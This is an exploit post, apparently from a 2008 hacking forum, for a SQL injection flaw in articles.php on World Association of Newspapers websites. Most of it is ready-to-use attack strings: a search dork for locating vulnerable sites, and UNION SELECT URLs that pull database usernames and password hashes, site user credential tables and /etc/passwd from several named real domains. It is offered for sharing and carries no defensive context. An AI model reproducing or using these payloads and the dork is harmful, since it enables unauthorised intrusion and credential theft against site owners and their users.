The World Association of Newspapers suffers from a remote SQL injection vulnerability in articles.php.
fee366ae992c786a3161cbe7d11678cc706d379c414b7b825b86f3682809d178
################################################################
# .___ __ _______ .___ #
# __| _/____ _______| | __ ____ \ _ \ __| _/____ #
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ #
# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #
# \/ \/ \/ #
# ___________ ______ _ __ #
# _/ ___\_ __ \_/ __ \ \/ \/ / #
# \ \___| | \/\ ___/\ / #
# \___ >__| \___ >\/\_/ #
# est.2007 \/ \/ forum.darkc0de.com #
################################################################
# --- d3hydr8 - rsauron - P47r1ck - r45c4l - C1c4Tr1Z - bennu #
# --- QKrun1x - skillfaker - Croathack - Optyx - Nuclear #
# --- Eliminator and to all members of darkc0de and ljuska.org# #
################################################################
#
# Author: baltazar and sinner_01
#
# Home : www.darkc0de.com & ljuska.org
#
# Email : b4ltazar@gmail.com, sinn3r01@gmail.com
#
# Share the c0de!
#
################################################################
#
# Name: World Association of Newspapers
#
# Home: https://www.wan-press.org/
#
# Dork: inurl:/articles.php?id= intext:WAN
#
# Vuln: https://www.site.com/articles.php?id=38+AND+1=2+union+all+select+concat_ws(char(58),user,password),1,2,3,4,5,6+from+mysql.user--
# https://www.site.com/articles.php?id=26+AND+1=2+union+all+select+load_file('/etc/passwd'),1,2,3,4,5,6+from+mysql.user--
#https://www.site.com/articles.php?id=26+AND+1=2+union+all+select+0,concat_ws(char(58),buser_login,buser_passwd),2,3,4,5,6+from+Back_users--
#https://www.site.com/articles.php?id=26+AND+1=2+union+all+select+0,concat_ws(char(58),fuser_login,fuser_passwd),2,3,4,5,6+from+Front_users--
#
# Example:
# https://www.wan-press.org/wef/articles.php?id=26+AND+1=2+union+all+select+concat_ws(char(58),user,password),1,2,3,4,5,6+from+mysql.user--
# https://www.wan-press.org/wef/articles.php?id=26+AND+1=2+union+all+select+load_file('/etc/passwd'),1,2,3,4,5,6+from+mysql.user--
#
# https://www.capetown2007.co.za/articles.php?id=38+AND+1=2+union+all+select+concat_ws(char(58),user,password),1,2,3,4,5,6+from+mysql.user--
# https://www.capetown2007.co.za/articles.php?id=38+AND+1=2+union+all+select+load_file('/etc/passwd'),1,2,3,4,5,6--
#
#https://www.trends-in-newsrooms.org/articles.php?id=20+AND+1=2+union+all+select+concat_ws(char(58),user,password),1,2,3,4,5,6+from+mysql.user--
# https://www.trends-in-newsrooms.org/articles.php?id=20+AND+1=2+union+all+select+load_file('/etc/passwd'),1,2,3,4,5,6+from+mysql.user--
#
# https://www.wansweden2008.com/articles.php?id=178+AND+1=2+union+all+select+concat_ws(char(58),user,password),1,2,3,4,5,6+from+mysql.user--
# https://www.wansweden2008.com/articles.php?id=178+AND+1=2+union+all+select+load_file('/etc/passwd'),1,2,3,4,5,6+from+mysql.user--
#
#https://www.worldpressfreedomday.org/articles.php?id=178+AND+1=2+union+all+select+concat_ws(char(58),user,password),1,2,3,4,5,6+from+mysql.user--
# https://www.worldpressfreedomday.org/articles.php?id=178+AND+1=2+union+all+select+load_file('/etc/passwd'),1,2,3,4,5,6+from+mysql.user--
#
# Vuln Discovered 09/11/2008